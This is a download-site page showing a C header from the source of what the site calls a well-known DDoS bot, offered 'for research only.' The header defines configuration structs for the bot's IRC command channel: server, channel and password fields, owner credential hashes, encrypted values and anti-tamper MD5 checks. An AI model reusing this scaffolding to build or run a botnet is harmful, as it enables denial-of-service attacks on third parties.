⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 confbase.h.svn-base

📁 很有名的一款用于组织DDoS的恶意机器人程序。仅供研究学习
💻 SVN-BASE
字号:
#ifndef __CONFBASE_H__
#define __CONFBASE_H__

// Type for CVar value
typedef struct conf_cvar_s {
	char		*szName;		// The name of the CVar
	char		*szValue;		// The CVars value
	char		*szCryptKey;	// The Sappire encryption key (leave empty for no encryption)
	char		*szMD5;			// The MD5 hash of the value (to prevent exe hacking)
} conf_cvar;

// Type for User
typedef struct conf_user_s {
	conf_cvar	 cUsername;		// The username
	conf_cvar	 cPasswordMD5;	// The passwords MD5 hash
	conf_cvar	 cHostmask;		// The host mask
	conf_cvar	 cIdentdmask;	// The identd mask
} conf_user;

// Type for Server
typedef struct conf_server_s {
	conf_cvar	 cChanPass;		// The channels password
	conf_cvar	 cMainChan;		// The main channel
	conf_cvar	 cNickPrefix;	// The nick prefix
	conf_cvar	 cPort;			// The port to connect to
	conf_cvar	 cServer;		// The server to connect to
	conf_cvar	 cServPass;		// The password of the server
	conf_cvar	 cUseSSL;		// Use SSL to connect ?
} conf_server;

#endif // __CONFBASE_H__

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -